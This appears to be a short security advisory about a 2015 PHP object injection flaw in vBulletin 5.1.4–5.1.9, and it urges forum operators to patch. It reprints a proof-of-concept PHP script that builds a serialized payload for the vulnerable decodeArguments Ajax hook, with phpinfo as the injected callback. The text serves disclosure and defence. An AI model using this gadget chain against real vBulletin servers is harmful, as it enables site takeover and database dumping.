vBulletin on 03 Nov 2015 released security patches. The vBulletin 5.1.4 to 5.1.9 is vulnerable to PHP Object injection, where attacker can take control of the website and dump the database of vBulletin forum.
It is found that vulnerability is released in the public. This vulnerability is very serious and easy to exploit to compromise the vBulletin forum server. The vBulletin main forum being defaced on Monday, by using this vulnerability.
We recommend to all vBulletin users to patch the PHP Object Injection vulnerability and harden the vBulletin server setup.
The decodeArguments Ajax API hook is vulnerable module of the vBulletin. As it is vulnerable to the PHP object injection, attacker will need to create the PHP Objects.
Following script is released to construct the Objects
<?php class vB_Database { public $functions = array(); public function __construct() { $this->functions['free_result'] = 'phpinfo'; } } class vB_dB_Result { protected $db; protected $recordset; public function __construct() { $this->db = new vB_Database(); $this->recordset = 1; } } print urlencode(serialize(new vB_dB_Result())) . "\n";
You can find more technical details about the vulnerability here